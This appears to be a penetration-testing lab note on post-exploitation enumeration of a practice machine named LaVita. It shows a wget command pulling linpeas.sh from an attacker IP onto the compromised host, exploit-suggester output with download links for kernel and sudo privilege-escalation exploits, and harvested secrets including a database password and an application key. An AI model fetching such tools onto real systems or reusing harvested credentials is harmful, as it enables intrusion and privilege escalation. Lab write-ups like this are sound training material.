PEAS
Conducting an automated enumeration after performing a manual enumeration
www-data@debian:/var/tmp$ wget -q http://192.168.45.249/linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
/Practice/LaVita/4-Post_Enumeration/attachments/Pasted-image-20250406132214.png)
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: probable
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: probable
Tags: ubuntu=(20.04|21.04),[ debian=11 ]
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loadedENV
╔══════════╣ Environment
╚ Any private information inside environment variables?
REDIS_PORT=6379
LOG_LEVEL=debug
DB_CONNECTION=mysql
MAIL_USERNAME=null
APP_DEBUG=true
MAIL_FROM_ADDRESS=null
DB_PORT=3306
APP_URL=http://hb02.onsec
SHLVL=2
PUSHER_APP_ID=
OLDPWD=/
PUSHER_APP_SECRET=
BROADCAST_DRIVER=log
MAIL_FROM_NAME=LaVita
APACHE_RUN_DIR=/var/run/apache2
DB_DATABASE=lavita
APP_NAME=LaVita
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SESSION_DRIVER=file
DB_USERNAME=lavita
LOG_CHANNEL=stack
AWS_DEFAULT_REGION=us-east-1
JOURNAL_STREAM=8:11424
_=./linpeas.sh
CACHE_DRIVER=file
TERM=xterm-256color
MAIL_ENCRYPTION=null
PUSHER_APP_KEY=
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PUSHER_APP_CLUSTER=mt1
INVOCATION_ID=b7df21ee0b3b4c35b6dc321a03d992b2
MAIL_PASSWORD=null
AWS_BUCKET=
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
MAIL_HOST=smtp.mailtrap.io
SESSION_LIFETIME=120
APACHE_RUN_GROUP=www-data
AWS_ACCESS_KEY_ID=
APACHE_RUN_USER=www-data
AWS_SECRET_ACCESS_KEY=
REDIS_PASSWORD=null
APACHE_LOG_DIR=/var/log/apache2
MAIL_PORT=2525
MAIL_MAILER=smtp
MIX_PUSHER_APP_KEY=
DB_PASSWORD=sdfquelw0kly9jgbx92
REDIS_HOST=127.0.0.1
MIX_PUSHER_APP_CLUSTER=mt1
PWD=/var/tmp
APP_KEY=base64:zfXJipTpbCyrZHRDpn0/NmdpHTbAl7/hCMf476EP1LU=
APP_ENV=local
DB_HOST=127.0.0.1
QUEUE_CONNECTION=sync
╔══════════╣ Analyzing Env Files (limit 70)
-rwxr-xr-x 1 www-data www-data 865 Apr 6 06:58 /var/www/html/lavita/.env
APP_NAME=LaVita
APP_ENV=local
APP_KEY=base64:zfXJipTpbCyrZHRDpn0/NmdpHTbAl7/hCMf476EP1LU=
APP_DEBUG=true
APP_URL=http://hb02.onsec
LOG_CHANNEL=stack
LOG_LEVEL=debug
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=lavita
DB_USERNAME=lavita
DB_PASSWORD=sdfquelw0kly9jgbx92
BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_MAILER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"Network
/Practice/LaVita/4-Post_Enumeration/attachments/{62960EF5-CE19-417F-A464-03E750945BC0}.png)
Installed Programs
/Practice/LaVita/4-Post_Enumeration/attachments/{9387CDC0-1CFD-4534-BD7D-7FA8322695A9}.png)
Apache
/Practice/LaVita/4-Post_Enumeration/attachments/{F01473D9-CF60-411D-A258-866316E913A3}.png)
DB Credential
/Practice/LaVita/4-Post_Enumeration/attachments/{7A718525-D9F0-4D97-938E-AF7DAC3BBB26}.png)
Fetched from the environment variables
SSH
/Practice/LaVita/4-Post_Enumeration/attachments/{138E38F9-A3FC-433B-85DC-B04799E28FD2}.png)
/Practice/LaVita/4-Post_Enumeration/attachments/{2B2EEB98-23E8-4C4E-8EB2-25B61E45564E}.png)